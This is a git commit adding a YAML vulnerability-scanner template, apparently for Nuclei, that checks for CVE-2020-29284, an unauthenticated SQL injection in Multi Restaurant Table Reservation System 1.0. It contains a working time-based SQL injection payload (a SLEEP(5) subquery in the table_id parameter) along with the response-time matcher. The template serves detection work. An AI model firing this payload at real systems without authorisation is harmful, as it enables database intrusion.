Add CVE-2020-29284
parent
6e8e050b7b
commit
37aaddf1ff
|
@ -0,0 +1,29 @@
|
|||
id: CVE-2020-29284
|
||||
|
||||
info:
|
||||
name: Multi Restaurant Table Reservation System 1.0 - SQL Injection
|
||||
author: edoardottt
|
||||
severity: critical
|
||||
description: |
|
||||
The file view-chair-list.php in Multi Restaurant Table Reservation System 1.0 does not perform input validation on the table_id parameter which allows unauthenticated SQL Injection. An attacker can send malicious input in the GET request to /dashboard/view-chair-list.php?table_id= to trigger the vulnerability.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/48984
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2020-29284
|
||||
classification:
|
||||
cve-id: CVE-2020-29284
|
||||
tags: cve,tablereservation,cve2020,sqli
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/TableReservation/dashboard/view-chair-list.php?table_id='+AND+(SELECT+1+FROM+(SELECT(SLEEP(5)))a)--+-"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: dsl
|
||||
dsl:
|
||||
- 'duration>=5'
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
Loading…
Reference in New Issue